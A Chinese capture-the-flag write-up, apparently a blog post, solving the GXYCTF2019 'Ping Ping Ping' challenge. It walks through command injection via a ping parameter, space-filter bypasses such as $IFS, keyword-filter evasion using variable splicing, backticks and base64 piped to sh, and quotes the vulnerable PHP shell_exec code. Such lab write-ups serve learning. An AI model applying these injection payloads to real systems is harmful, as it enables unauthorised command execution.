文章目录
打开链接,页面提示/?ip=
猜测本题的意思是让我们把这个当做变量上传参数。
先输入127.0.0.1
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/20551520493873cb6ef90b929c7cdd24.png)
网页把我们上传的东西当做ip来执行ping操作。
试试看能不能利用一下管道:
?ip=127.0.0.1;ls
出现了flag.php,输入cat flag.php
?ip=127.0.0.1;cat flag.php
嗯?过滤空格?
过滤空格的解决办法如下
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
经过测试之后$IFS$9可以当作空格成功执行:
?ip=127.0.0.1|cat$IFS$9flag.php
好像有过滤flag字样的,那先看看index.php,看看过滤规则。
?ip=127.0.0.1;cat$IFS$1index.php
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
这些是正则匹配的过滤方式,好像过滤的挺多,很多符号都被过滤了。
1.cat fl* 利用*匹配任意 不行
2.echo “Y2F0IGZsYWcucGhw”| base64 -d | bash 也不行
3.ca\t fl\ag.php 不行
4.cat fl’'ag.php 不行
解决办法:
1.$a变量可以覆盖
构造
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
2.利用
?ip=127.0.0.1;cat$IFS$9`ls`
将ls的结果当成cat的参数,那样就不用出现flag这个参数了。
结果也是在源码中。
3.过滤bash用sh执行
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
参考文章:
[学习笔记1]buu [GXYCTF2019]Ping Ping Ping
[GXYCTF2019]Ping Ping Ping
[GXYCTF2019 ]Ping Ping Ping
[GXYCTF2019]Ping Ping Ping(RCE)